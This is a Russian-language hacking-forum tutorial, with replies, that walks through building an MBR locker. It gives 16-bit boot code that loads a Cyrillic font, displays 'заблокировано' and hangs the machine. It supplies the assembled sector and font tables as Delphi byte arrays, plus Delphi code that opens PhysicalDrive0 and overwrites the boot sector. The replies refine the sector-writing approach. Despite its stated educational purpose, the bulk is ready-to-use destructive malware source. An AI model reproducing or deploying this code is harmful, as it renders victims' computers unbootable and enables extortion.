Здравствуйте уважаемые форумчане. Сегодня в этой статье я хотел бы разобрать механизмы такого зверя как mbr locker и показать в виде кода простой пример написания таких зверей. Сразу говорю: Статья написана ИСКЛЮЧИТЕЛЬНО в познавательных целях и я не несу никакой ответственности за использование материалов статьи в кибер-преступных целях. Огромное спасибо slesh’u за консультации по битовым матрицам. Арсенал: 1) NASM. я перехожу на этот компилятор в виду удобства программирования низкоуровневых вещей. 2) Delphi (можно использовать любой удобный вам ЯП) 3)WINHEX (HIEW или любой удобный вам хексредактор) 4)Эмулятор (emu8086, bochs, или виртуальную машину) 5)Документация по прерываниям BIOS 6)Калькулятор и так начнем. Что собой являет mbr. MBR это главная загрузочная запись, код, необходимый для последующей загрузки ОС и расположен в первом секторе ЖД (или другого ус-ва). После включения питания компьютера, проходит так называемая процедура POST тестирующая аппаратное обеспечение ,по прохождению которой BIOS загружает MBR в оперативную память по адресу 0x7C00 и передает ему управление. С этого и начинаем отталкиваться. Т.е. пишем загрузчик. Code: [BITS 16] [ORG 0x7C00] указываем на 16 битный код и устанавливаем "нужный" адрес. после этого мы должны настроить сегменты, при не правильно настроенных сегментах прерывания могут "повесить" систему. Code: mov ax, cs cli mov ss, ax mov es, ax mov ds, ax mov sp, entry sti ax= сегменту кода стэк-такой же как и сегмент кода, данные также-все в одном месте. при настройке запрещаем прерывания, потому что мы еще не готовы после настройки-включаем прерывания. По сути дела основа есть. Дальше мы должны подумать. У нас нет ни прерываний ДОС ни функций WINDOWS (это понятно я думаю) так что остается работать с экраном только через прерывания BIOS. Прежде всего произведем очистку экрана (это, кстати, сыграет полезную роль при эмуляции через bochs) Code: mov ax,03 int 0x10 Теперь следующий, очень важный момент. Прерывания BIOS не умеет\не знает русские символы. Предположим что мы затачиваем нашу малварь под русскоязычную аудиторию. Для того что бы мы могли писать русским нам требуется составить битовые матрицы, записать их в файл в виде хекса и подгружать( спасибо slesh’u за разбор битовых матриц) что собой представляет битовая матрица. Стандартные размеры символов возьмем как 8х16 соответственно буква «Я» будет выглядеть так: Как составляем такой файл. Берем рисуем любой символ с помошью битовой матрицы. далее каждую строку переводим в хекс и записываем в файл по порядку начиная от ascii кода 192 до 255. Соответственно буква «Я» будет выглядеть так: 00, 00, 7E, C6, C6, C6, C6, 7E, 36, 66, C6, C6, 00, 00, 00, 00 Не трудно понять что каждой букве будет соответствовать 16 байт ее описания. Дальше стает ясно, что разместить весь алфавит (даже с заменой некоторых русских символов на латинские) нельзя. Не хватит места для сообщения и вообще мы можем не уместиться в размер мбр-512 байт, потому что в русском алфавите 33 буквы если для каждой составить описание получается 528 байт. Значит нам нужно составить файл шрифтов, записать его в какие либо сектора и оттуда читать. Думаем заранее в какие сектора будем писать, потому что это задача высокоуровневой программы.Т.к. файл шрифтов получился у меня ровно 1кб (1024 байта, т.к. я откинул буквы Ё и ё) .Размер одного сектора=512 байт, я буду писать во 3 и 4 сектора. Загрузка таблицы в память Code: mov ah,0x02 mov al,0x02 mov bx,0x1000 mov cx,0x0003 int 0x13 Вторая ф-я 13 прерывания- чтение секторов -читаем 2 сектора (3 и 4) -записываем таблицу по адресу 0х1000 -чтение начинаем с 3-го сектора. Для эмуляции на дискете нужно добавить еще xor dx,dx ибо после передачи управления mbr в младшем байте регистра оказывается значение диска на котором мы находимся, соответственно у дискеты он = 0, высокоуровневая программа переписывает mbr таким образом что запоминать младший байт нет необходимости. Далее это будет видно. После чтения таблицы нужно изменить ее. Изменение таблицы Code: mov ah,0x11 xor al,al mov bp,bx mov cx,64 mov dx,192 int 0x10 11 функция 0 подфункция смена на пользовательскую таблицу. -адрес таблицы был в bx -64 палитры -изменяем начиная с 192 символа (код АСКИ буква «А») Вот собсно и все. Дальше нам остается только выводить сообщения. Code: mov ah,0x13 xor al,al mov bx,00001010b xor dx,dx mov cx,msgend-msg call msgend msg db 'заблокировано' msgend: pop bp int 0x10 jmp $ 13 ф-я 0 подфунк. писать строку. -в bx задается атрибуты символов. 0 1 2 бит- цвет символа- ярко зеленый 3 бит- яркость- яркий 4 5 6 бит- задний план- черный 7 бит- мерцание- без мерцания -выводим с позиции начала экрана. -cx длинна сообщения. -bp- сообщение и зависаем в бесконечном цикле. Я не делал ввода строки, ее проверки, возврата и записи оригинального мбр, т.к. статья носит чисто поучительный характер, и добрые хацкеры не будут восстанавливать мбр, а еще и таблицу разделов снесут нахрен для них главное- выхлоп. Что то отошли от темы. в завершении заполняем оставшееся про-во 0 и указываем сигнатуру mbr. Code: TIMES 510-($-$$) db 0 dw 0xAA55 для эмуляции на дискете последней строчкой укажите включение файла шрифтов Code: incbin file.fnt все. С низким уровнем мы покончили. Приступаем к написанию высокоуровневой части. Открываем делфю, создаем юнит, т.к. мы будем юзать чисто АПИ. Я додумал лишь 2 метода: 1)Разобрать все хекс редактором и создать массивы байт 2)Запихать все в ресурсы-доставать-читать-писать. Применять буду первый.И так берем загрузчик и открываем в winhex. с помощью команды edit->copy block->pascal source получаем готовый набор байт уже в синтаксисе Delphi. Так же делаем и с таблицей, то есть получается 3 массива. Таблицу делим до смещения 200 - 1-ая часть, после 200 вторая часть. имеем Code: mbr:array[1..512]of byte =( $8C, $C8, $FA, $8E, $D0, $8E, $C0, $8E, $D8, $BC, $00, $7C, $FB, $B8, $03, $00, $CD, $10, $B4, $02, $B0, $02, $BB, $00, $10, $B9, $02, $00, $CD, $13, $B4, $11, $30, $C0, $89, $DD, $B9, $40, $00, $BA, $C0, $00, $CD, $10, $B4, $13, $30, $C0, $BB, $0A, $00, $31, $D2, $B9, $0D, $00, $E8, $0D, $00, $E7, $E0, $E1, $EB, $EE, $EA, $E8, $F0, $EE, $E2, $E0, $ED, $EE, $5D, $CD, $10, $EB, $FE, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $55, $AA ); tbl_1S:array [1..512]of byte =($00, $00, $3E, $66, $C6, $C6, $C6, $FE, $C6, $C6, $C6, $C6, $00, $00, $00, $00, $00, $00, $FE, $C0, $C0, $C0, $FC, $C6, $C6, $C6, $C6, $FC, $00, $00, $00, $00, $00, $00, $FC, $C6, $C6, $C6, $FC, $C6, $C6, $C6, $C6, $FC, $00, $00, $00, $00, $00, $00, $FE, $C6, $C0, $C0, $C0, $C0, $C0, $C0, $C0, $C0, $00, $00, $00, $00, $00, $00, $3C, $6C, $6C, $6C, $6C, $6C, $6C, $6C, $6C, $FE, $C6, $82, $00, $00, $00, $00, $FE, $C6, $C0, $C0, $F0, $C0, $C0, $C0, $C6, $FE, $00, $00, $00, $00, $00, $00, $D6, $D6, $D6, $54, $7C, $D6, $D6, $D6, $D6, $D6, $00, $00, $00, $00, $00, $00, $7C, $C6, $06, $06, $1C, $06, $06, $C6, $C6, $7C, $00, $00, $00, $00, $00, $00, $C6, $C6, $C6, $C6, $CE, $DE, $F6, $E6, $C6, $C6, $00, $00, $00, $00, $00, $0C, $DA, $C6, $C6, $C6, $CE, $DE, $F6, $E6, $C6, $C6, $00, $00, $00, $00, $00, $00, $C6, $CC, $D8, $F0, $F0, $D8, $CC, $C6, $C6, $C6, $00, $00, $00, $00, $00, $00, $1E, $36, $66, $C6, $C6, $C6, $C6, $C6, $C6, $C6, $00, $00, $00, $00, $00, $00, $C6, $C6, $EE, $EE, $FE, $FE, $D6, $D6, $C6, $C6, $00, $00, $00, $00, $00, $00, $C6, $C6, $C6, $C6, $FE, $C6, $C6, $C6, $C6, $C6, $00, $00, $00, $00, $00, $00, $7E, $C6, $C6, $C6, $C6, $C6, $C6, $C6, $C6, $FC, $00, $00, $00, $00, $00, $00, $FE, $C6, $C6, $C6, $C6, $C6, $C6, $C6, $C6, $C6, $00, $00, $00, $00, $00, $00, $FC, $C6, $C6, $C6, $C6, $C6, $FC, $C0, $C0, $C0, $00, $00, $00, $00, $00, $00, $7C, $C6, $C6, $C0, $C0, $C0, $C0, $C6, $C6, $7C, $00, $00, $00, $00, $00, $00, $7E, $7E, $5A, $18, $18, $18, $18, $18, $18, $18, $00, $00, $00, $00, $00, $00, $C6, $C6, $C6, $C6, $C6, $C6, $7E, $06, $C6, $7C, $00, $00, $00, $00, $00, $00, $7C, $D6, $D6, $D6, $D6, $D6, $D6, $7C, $10, $38, $00, $00, $00, $00, $00, $00, $C6, $C6, $6C, $38, $38, $6C, $C6, $C6, $C6, $C6, $00, $00, $00, $00, $00, $00, $CC, $CC, $CC, $CC, $CC, $CC, $CC, $CC, $CC, $FE, $02, $06, $04, $00, $00, $00, $C6, $C6, $C6, $C6, $C6, $7E, $06, $06, $06, $06, $00, $00, $00, $00, $00, $00, $D6, $D6, $D6, $D6, $D6, $D6, $D6, $D6, $D6, $FE, $00, $00, $00, $00, $00, $00, $D6, $D6, $D6, $D6, $D6, $D6, $D6, $D6, $D6, $FE, $02, $06, $04, $00, $00, $00, $E0, $E0, $60, $60, $7C, $66, $66, $66, $66, $7C, $00, $00, $00, $00, $00, $00, $C6, $C6, $C6, $C6, $E6, $B6, $B6, $B6, $B6, $E6, $00, $00, $00, $00, $00, $00, $C0, $C0, $C0, $C0, $FC, $C6, $C6, $C6, $C6, $FC, $00, $00, $00, $00, $00, $00, $78, $CC, $06, $06, $1E, $1E, $06, $06, $CC, $78, $00, $00, $00, $00, $00, $00, $9C, $B6, $B6, $B6, $F6, $B6, $B6, $B6, $B6, $9C, $00, $00, $00, $00, $00, $00, $7E, $C6, $C6, $C6, $C6, $7E, $36, $66, $C6, $C6, $00, $00, $00, $00 ); tbl_2S: array [1..512] of byte=($00, $00, $00, $00, $00, $7C, $C6, $C6, $C6, $FE, $C6, $C6, $00, $00, $00, $00, $00, $00, $00, $00, $00, $FE, $C0, $FC, $C6, $C6, $C6, $FC, $00, $00, $00, $00, $00, $00, $00, $00, $00, $FC, $C6, $C6, $FC, $C6, $C6, $FC, $00, $00, $00, $00, $00, $00, $00, $00, $00, $FE, $C6, $C2, $C0, $C0, $C0, $C0, $00, $00, $00, $00, $00, $00, $00, $00, $00, $3C, $6C, $6C, $6C, $6C, $6C, $FE, $C6, $82, $00, $00, $00, $00, $00, $00, $00, $7C, $C6, $C6, $FC, $C0, $C6, $7C, $00, $00, $00, $00, $00, $00, $00, $00, $00, $D6, $D6, $D6, $7C, $D6, $D6, $D6, $00, $00, $00, $00, $00, $00, $00, $00, $00, $7C, $C6, $06, $1C, $06, $C6, $7C, $00, $00, $00, $00, $00, $00, $00, $00, $00, $C6, $C6, $CE, $DE, $F6, $E6, $C6, $00, $00, $00, $00, $00, $00, $00, $0C, $18, $C6, $C6, $CE, $DE, $F6, $E6, $C6, $00, $00, $00, $00, $00, $00, $00, $00, $00, $C6, $CC, $D8, $F8, $D8, $CC, $C6, $00, $00, $00, $00, $00, $00, $00, $00, $00, $3E, $66, $66, $66, $66, $66, $C6, $00, $00, $00, $00, $00, $00, $00, $00, $00, $C6, $EE, $FE, $D6, $C6, $C6, $C6, $00, $00, $00, $00, $00, $00, $00, $00, $00, $C6, $C6, $C6, $FE, $C6, $C6, $C6, $00, $00, $00, $00, $00, $00, $00, $00, $00, $7E, $C6, $C6, $C6, $C6, $C6, $FC, $00, $00, $00, $00, $00, $00, $00, $00, $00, $FE, $C6, $C6, $C6, $C6, $C6, $C6, $00, $00, $00, $00, $00, $00, $00, $00, $00, $FC, $C6, $C6, $C6, $C6, $C6, $FC, $C0, $C0, $C0, $00, $00, $00, $00, $00, $00, $7C, $C6, $C0, $C0, $C2, $C6, $7C, $00, $00, $00, $00, $00, $00, $00, $00, $00, $7E, $5A, $18, $18, $18, $18, $18, $00, $00, $00, $00, $00, $00, $00, $00, $00, $C6, $C6, $C6, $C6, $C6, $C6, $7E, $06, $C6, $7C, $00, $00, $00, $00, $00, $10, $7C, $D6, $D6, $D6, $D6, $D6, $7C, $10, $38, $00, $00, $00, $00, $00, $00, $00, $C6, $6C, $38, $38, $6C, $C6, $C6, $00, $00, $00, $00, $00, $00, $00, $00, $00, $CC, $CC, $CC, $CC, $CC, $CC, $FE, $06, $0C, $00, $00, $00, $00, $00, $00, $00, $C6, $C6, $C6, $C6, $7E, $06, $06, $00, $00, $00, $00, $00, $00, $00, $00, $00, $D6, $D6, $D6, $D6, $D6, $D6, $FE, $00, $00, $00, $00, $00, $00, $00, $00, $00, $D6, $D6, $D6, $D6, $D6, $D6, $FE, $02, $06, $04, $00, $00, $00, $00, $00, $00, $E0, $60, $7C, $66, $66, $66, $7C, $00, $00, $00, $00, $00, $00, $00, $00, $00, $C6, $C6, $E6, $B6, $B6, $B6, $E6, $00, $00, $00, $00, $00, $00, $00, $00, $00, $C0, $C0, $FC, $C6, $C6, $C6, $FC, $00, $00, $00, $00, $00, $00, $00, $00, $00, $7C, $C6, $06, $1E, $06, $C6, $7C, $00, $00, $00, $00, $00, $00, $00, $00, $00, $9C, $B6, $B6, $F6, $B6, $B6, $9C, $00, $00, $00, $00, $00, $00, $00, $00, $00, $7E, $C6, $C6, $7E, $36, $66, $C6, $00, $00, $00, $00 ); Остается лишь осуществить запись: Code: CreateFile('\\.\PhysicalDrive0',GENERIC_WRITE,FILE_SHARE_WRITE,0,OPEN_EXISTING,0,0); открываем диск Code: WriteFile(f,mbr,sizeof(mbr),nw,nil); записываем мбр Code: SetFilePointer(f,2*512,nil,FILE_BEGIN); WriteFile(f,tbl_1S,sizeof(tbl_1S),nw,nil); SetFilePointer(f,3*512,nil,FILE_BEGIN); WriteFile(f,tbl_2S,sizeof(tbl_2S),nw,nil); CloseHandle(f) записываем таблицу в третий и четвертый секторы. запись производится по формуле номер сектора*512. закрываем диск. Вот в общем то и все. Результат: В целом на этом все. Спасибо за внимание, надеюсь кому то было интересно. DooD. All rights reserved
1) расположен в первом секторе ЖД - называется нулевой сектор ) 2) пользовательскую палитру. - не палитру, а таблицу для знакогенератора. 3) зачем мучаться с кусками. Тупо сделай один файл на 3 сектора. И целеком запиши за один раз. зачем тебе переходить на другие сектора и прочие, если у тебя всё и так имеет размер кратный сектору. после компиляции файл сразу перегоняй в вид достаточный для записи и записывай его сразу.
1)но ведь это же первый сектор,разве нет? 2)исправил 3)ну эт для наглядности,эт просто попало что кратно,а так для лучшего понимания я сделал для каждого сектора.
И еще вопросик.Почему запись производится по формуле номер сектора*512? Ведь если 1*512, указатель будет стоять на конце первого,то есть на втором секторе?
размер сектора =512 байт. первый сектор это mbr, при открытии диска мы уже пишем первый сектор,во вторых если указывать setfilepointer ты можешь указать разный флаг.
Да,но вот здесь получается ты пишешь в 3,4 сектора? Code: SetFilePointer(f,2*512,nil,FILE_BEGIN); WriteFile(f,tbl_1S,sizeof(tbl_1S),nw,nil); SetFilePointer(f,3*512,nil,FILE_BEGIN); WriteFile(f,tbl_2S,sizeof(tbl_2S),nw,nil); CloseHandle(f)
Очень аргументированная критика. Не совсем понятно, почему используем сектора 1, 3, 4 а не 1, 2, 3. Также не очень понравилось, как описана работа ассемблерного кода. Лучше комментировать каждую строчку, а не писать в таком стиле: Когда читаешь эти строки: возникает вопрос, можно ли использовать 32-битный код?
можно использовать любые сектора,просто мне так захотелось.по правильному если, нужно искать сектора в которых нет данных(то есть нули) и писать туда. Комментировал так: строка асм кода-строка комента. использовать 32 битный нельзя,т.к. мы в реальном режиме,для использования 32 битн. надо включать линию А20
Не всегда, для определение размера сектора можно воспользоватся информацией из геометрии диска. В свое время писал программу установщик, которая генерирует код "на лету" используя заранее заготовленные смещения в ассемблерном коде. http://c0dedgarik.blogspot.com/2010/10/blog-post.html